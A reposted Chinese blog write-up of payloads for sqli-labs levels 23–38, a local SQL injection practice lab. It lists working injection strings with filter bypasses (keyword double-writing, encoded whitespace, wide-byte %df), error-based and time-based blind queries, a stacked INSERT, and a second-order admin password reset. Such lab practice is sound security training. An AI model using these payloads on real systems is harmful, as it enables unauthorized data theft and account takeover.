Sqli-labs靶场payload(23-38进阶篇)原创

2023-11-23 22:10
文章标签 进阶篇 靶场 23 labs 38 原创 payload sqli

本文主要是介绍Sqli-labs靶场payload(23-38进阶篇)原创,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

T23 单引号闭合 --+ #过滤 所以可以尝试补全的方法 
127.0.0.1/sqli-labs/Less-23/?id=1' or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,2,3 or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,database(),3 or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema="security" or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" or '1'='1
T24  密码重置越权漏洞
Desired Username:admin' #
Password:123
Retype Password:123
then-->Login
Change Password
Current Password:123
New Password:123456
Retype Password:123456
then Logout
Username:admin
Password:123456
Login Successfully!
T25 单引号闭合  屏蔽内容:or and 
http://127.0.0.1/sqli-labs/Less-25/?id=1' --+
http://127.0.0.1/sqli-labs/Less-25/?id=1' order by 3 --+   //屏蔽了or
http://127.0.0.1/sqli-labs/Less-25/?id=1' oRder by 3 --+   //大小写绕过失败
http://127.0.0.1/sqli-labs/Less-25/?id=1' oorrder by 3 --+   //双写绕过成功
127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,2,3 --+
127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,database(),3 --+
http://127.0.0.1/sqli-labs/Less-25/?id=1' or '1'='1   //屏蔽了or
http://127.0.0.1/sqli-labs/Less-25/?id=1' || '1'='1   //绕过成功
http://127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,database(),3 || '1'='1
http://127.0.0.1/sqli-labs/Less-25/?id=1' and '1'='1  //屏蔽了and
http://127.0.0.1/sqli-labs/Less-25/?id=1' && '1'='1  //屏蔽了&&
http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd '1'='1   //双写绕过成功
http://127.0.0.1/sqli-labs/Less-25/?id=1' %26%26 '1'='1   //url编码绕过成功

T25a 屏蔽#  数字型 and or过滤 

and 1=2 会报错的说明是数字型 不报错的是字符型  数字型不用闭合 所以逻辑语句有意义 字符型在没有闭合的情况下 输入的内容都是字符类型 不具有逻辑判断功能
http://127.0.0.1/sqli-labs/Less-25a/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-25a/?id=1 anandd 1=2   //报错 说明是数字型
http://127.0.0.1/sqli-labs/Less-25a/?id=1 oorrder by 3
http://127.0.0.1/sqli-labs/Less-25a/?id=-1 union select 1,2,3
http://127.0.0.1/sqli-labs/Less-25a/?id=-1 union select 1,database(),3
T26 单引号闭合 屏蔽了空格 屏蔽了注释符 or and 也屏蔽了减号 所以id只能写很大来报错 
http://127.0.0.1/sqli-labs/Less-26/?id=1' or '1'='1   //屏蔽了or 和空格
http://127.0.0.1/sqli-labs/Less-26/?id=1' || '1'='1   //成功绕过or 还剩空格限制
http://127.0.0.1/sqli-labs/Less-26/?id=1'order by 4||'1'='1  //order被过滤掉了or 同时空格被过滤掉了
http://127.0.0.1/sqli-labs/Less-26/?id=1'oorrder by 4||'1'='1  //双写绕过order过滤 还剩空格
http://127.0.0.1/sqli-labs/Less-26/?id=1'oorrder%09by%094||'1'='1  //特殊编码%09绕过失败
有待补充空格绕过方法
id=1'
id=1%27||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database())),0x7e),1))||1=%27
id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database())),0x7e),1))||'1'='1
id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema,tables)where(table_schema)like(database())),0x7e),1))||'1'='1
T26a 屏蔽注释符 屏蔽减号 屏蔽or(大小写or绕过无效)屏蔽and 屏蔽&& 不屏蔽||  屏蔽空格  闭合方式('')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
} 
http://127.0.0.1/sqli-labs/Less-26a/?id=3' ||'  闭合错误
http://127.0.0.1/sqli-labs/Less-26a/?id=3') ||('   闭合成功!
http://127.0.0.1/sqli-labs/Less-26a/?id=3') oorrder by 3 ||('    //Hint: Your Input is Filtered with following result: 3')orderby3||('
http://127.0.0.1/sqli-labs/Less-26a/?id=3')union select 1,2,3||('    //result: 3')unionselect1,2,3||('
//可能由于环境问题 windows下无法绕过空格 只能想办法构造无空格的语句
http://127.0.0.1/sqli-labs/Less-26a/?id=3')anandd('')||('
http://127.0.0.1/sqli-labs/Less-26a/?id=3')anandd('updatexml(1,concat(0x7e,(select(database())),0x7e),1)')||('    //报错方式没有回显
http://127.0.0.1/sqli-labs/Less-26a/?id=300000')oorr('updatexml(1,concat(0x7e,(select(database())),0x7e),1)')||('   //报错方式没有回显
接下来尝试盲注方式
http://127.0.0.1/sqli-labs/Less-26a/?id=300000')oorr('(if(length(database())=8,1,sleep(5)))')||('
T27 单引号闭合 屏蔽了减号 注释符 空格 
http://127.0.0.1/sqli-labs/Less-27/?id=1' --+  //屏蔽了减号
http://127.0.0.1/sqli-labs/Less-27/?id=1' or '1'='1  //屏蔽了空格
http://127.0.0.1/sqli-labs/Less-27/?id=1' union select 1,2,3 or '1'='1  //屏蔽了空格和union select
http://127.0.0.1/sqli-labs/Less-27/?id=1' uNion sElect 1,2,3 or '1'='1  //union select大小写绕过成功
http://127.0.0.1/sqli-labs/Less-27/?id=1' ununionion seselectlect 1,2,3 or '1'='1  //双写绕过union成功 select失败
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,2,3%0bor%0b'1'='1  // %0b绕过空格成功大小写绕过union select屏蔽成功!
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,database(),3%0bor%0b'1'='1
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema="security"%0bor%0b'1'='1
http://127.0.0.1/sqli-labs/Less-27/?id=300000'%0buNion%0bsElEct%0b1,2,3 ||'1'='1
T27a 屏蔽空格  屏蔽注释符 没屏蔽and和or   屏蔽select  是双引号闭合 则直接闭合语句  
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out Select
return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 
http://127.0.0.1/sqli-labs/Less-27a/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-27a/?id=1%0band%0b1=2
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,2,3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,database(),3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,database(),3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,group_concat(table_name),3 from information_schema.tables where table_schema=database()||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000"%0a%0auniOn%0aSEleCT%0a1,group_concat(table_name),3%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000"%0buniOn%0bsElect%0b1,2,3%0bor"1"="1
★T28  单引号闭合  屏蔽了空格,--+ #   屏蔽方法:union select同时出现一起屏蔽 不单独屏蔽 
http://127.0.0.1/sqli-labs/Less-28/?id=2')or('
http://127.0.0.1/sqli-labs/Less-28/?id=2000') union select 1,2,3 or('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,2,3%0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,group_concat(table_name),3 from information_schema.tables where table_schema="security" %0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema="security"%0b%0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=20000')%0bunion%0bunion%0bselect%0bselect%0b1,2,3%0bor%0b('1')=('1
T28a  union select屏蔽  屏蔽# 不屏蔽--+  闭合是('')  
经验:order by能报错才是正确的闭合 有时候双引号也能正确 但是并不是正确的闭合 双引号后面不会执行 
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
http://127.0.0.1/sqli-labs/Less-28a/?id=1 and 1=2   //没有报错 说明不是数字型
http://127.0.0.1/sqli-labs/Less-28a/?id=2" #  //找到闭合为双引号
http://127.0.0.1/sqli-labs/Less-28a/?id=2') order by 3--+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2') union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2')union union select select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2')union union select select 1,database(),3 --+
T29-T31暂时不做
T32 宽字节注入 单引号闭合 
http://127.0.0.1/sqli-labs/Less-32/?id=1'--+  //单引号被反斜杠注释了
http://127.0.0.1/sqli-labs/Less-32/?id=1%df'--+
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ="security" --+  //security的两个引号被过滤了
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =0x7365637572697479 --+
T33 宽字节注入 单引号闭合 和T32一致 
http://127.0.0.1/sqli-labs/Less-33/?id=1%df'--+
http://127.0.0.1/sqli-labs/Less-33/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-33/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =0x7365637572697479 --+
T34 POST注入之宽字节注入 单引号闭合 
uname=admin%df' #&passwd=admin&submit=Submit
uname=admin%df'order by 2 #&passwd=admin&submit=Submit
uname=adn%df' union select 1,2 #&passwd=admin&submit=Submit
uname=adn%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 #&passwd=admin&submit=Submit
T35 数字型注入+宽字节注入 无需闭合 
http://127.0.0.1/sqli-labs/Less-35/?id=1 and 1=1
http://127.0.0.1/sqli-labs/Less-35/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-35/?id=-1 union select 1,2,3
http://127.0.0.1/sqli-labs/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479
T36 宽字节注入 单引号闭合 
http://127.0.0.1/sqli-labs/Less-36/?id=1%df' --+
http://127.0.0.1/sqli-labs/Less-36/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-36/?id=-1%df' union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-36/?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
T37 POST注入 宽字节注入 
uname=admin%df' #&passwd=aa&submit=Submit
uname=admin%df' order by 2 #&passwd=aa&submit=Submit
uname=ain%df' union select 1,2 #&passwd=aa&submit=Submit
uname=ain%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 #&passwd=aa&submit=Submit
T38 堆叠查询注入 
http://127.0.0.1/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values(70,'zjzj','hahaha') --+
http://127.0.0.1/sqli-labs/Less-38/?id=70

这篇关于Sqli-labs靶场payload(23-38进阶篇)原创的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/420755

相关文章

【网络安全的神秘世界】搭建dvwa靶场

【网络安全的神秘世界】搭建dvwa靶场

🌝博客主页:泥菩萨 💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具 下载DVWA https://github.com/digininja/DVWA/blob/master/README.zh.md 安装DVWA 安装phpstudy https://editor.csdn.net/md/?articleId=1399043
阅读更多...
Pikachu靶场--CRSF

Pikachu靶场--CRSF

借鉴参考 CSRF跨站请求伪造(CTF教程,Web安全渗透入门)_bilibili pikachu靶场CSRF之TOKEN绕过_csrf token绕过的原理-CSDN博客 CSRF(get) 发现需要登录 查看提示,获取username和password  选择一个用户进行登录 选择修改个人信息  修改信息的过程中利用BP抓包  抓包成功-->相关工具--
阅读更多...
人工智能在数字病理切片虚拟染色以及染色标准化领域的研究进展|顶刊速递·24-06-23

人工智能在数字病理切片虚拟染色以及染色标准化领域的研究进展|顶刊速递·24-06-23

小罗碎碎念 本期推文主题:人工智能在数字病理切片虚拟染色以及染色标准化领域的研究进展 这一期的推文是我发自内心觉得为数不多,特别宝贵的一篇推文,原因很简单——可参考的文献相对较少&方向非常具有研究意义&现在不卷。 数字病理方向的老师/同学应该清楚,不同中心提供的切片,染色方案是存在差异的,并且还存在各种质量问题,所以我们在数据预处理的时候,通常会先对切片的质量执行一遍筛选,然后再进行染
阅读更多...
leetcode刷题(38)——142. 环形链表 II

leetcode刷题(38)——142. 环形链表 II

给定一个链表,返回链表开始入环的第一个节点。 如果链表无环,则返回 null。 为了表示给定链表中的环,我们使用整数 pos 来表示链表尾连接到链表中的位置(索引从 0 开始)。 如果 pos 是 -1,则在该链表中没有环。 说明:不允许修改给定的链表。 示例 1: 输入:head = [3,2,0,-4], pos = 1 输出:tail connects to node index 1
阅读更多...
23.并发

23.并发

目录 一、一些概念二、进程和线程2.1 概念2.2 多线程导致的问题2.3 使用spawn创建新线程2.4 线程与move闭包 三、消息传递3.1 概念3.2 创建通道3.3 示例3.4 其它测试 四、共享状态并发4.1 互斥器4.2 Mutex的API4.3 多线程共享Mutex1)在多线程之间共享值;2)多线程和多所有权3) 原子引用计数4)RefCell/Rc与 Mutex/Arc的相
阅读更多...
【进阶篇-Day5:JAVA常用API的使用(Math、BigDecimal、Object、包装类等)】

【进阶篇-Day5:JAVA常用API的使用(Math、BigDecimal、Object、包装类等)】

目录 1、API的概念2、Object类2.1 Object类的介绍2.2 Object的toString()方法2.3 Object的equals()方法2.4 Objects概述 3、Math类4、System类5、BigDecimal类6、包装类6.1 包装类的概念6.2 几种包装类(1)手动转换包装类:(2)自动转换包装类:(3)Integet常用方法:(4)练习: 1
阅读更多...
24-6-23-读书笔记(七)-《文稿拾零》豪尔赫·路易斯·博尔赫斯(第三辑)

24-6-23-读书笔记(七)-《文稿拾零》豪尔赫·路易斯·博尔赫斯(第三辑)

文章目录 《文稿拾零》阅读笔记记录总结 《文稿拾零》   《文稿拾零》超厚的一本书(570+),看得时间比较长,这本书是作者零散时间写的一些关于文学性质的笔记,读起来还是比较无趣的,非常零散,虽然有很多有趣的观点,但连不起来,不像毛姆的读书笔记,简单记录一下了。 阅读笔记记录 P3 桑德堡身上有一种疲倦的忧伤,一种平原傍晚时的忧伤,泥沙浊流的忧伤,无用却又精确回忆的忧伤,一个
阅读更多...
query string parameters 和request payload

query string parameters 和request payload

HTTP请求中,如果是get请求,那么表单参数以name=value&name1=value1的形式附到url的后; post请求:表单参数是在请求体中,也是name=value&name1=value1的形式在请求。 export const voucherDetailAdd=(token,formStr) =>{return axios.post(`${base}/voucher/deta
阅读更多...
【原创】springboot+mysql海鲜商城设计与实现

【原创】springboot+mysql海鲜商城设计与实现

个人主页:程序猿小小杨 个人简介:从事开发多年,Java、Php、Python、前端开发均有涉猎 博客内容:Java项目实战、项目演示、技术分享 文末有作者名片,希望和大家一起共同进步,你只管努力,剩下的交给天意。 前言: 随着人们生活水平的提高和饮食习惯的改变,海鲜因其独特的营养价值和风味越来越受到消费者的青睐。海鲜市场作为主要的海鲜供应渠道,市场规模在不断扩大。这种不断增长的市场需求
阅读更多...
LeetCode 每日一题 2024/6/17-2024/6/23

LeetCode 每日一题 2024/6/17-2024/6/23

记录了初步解题思路 以及本地实现代码;并不一定为最优 也希望大家能一起探讨 一起进步 目录 6/17 522. 最长特殊序列 II6/18 2288. 价格减免6/19 2713. 矩阵中严格递增的单元格数6/20 2748. 美丽下标对的数目6/21 LCP 61. 气温变化趋势6/22 2663. 字典序最小的美丽字符串6/23 520. 检测大写字母 6/1
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2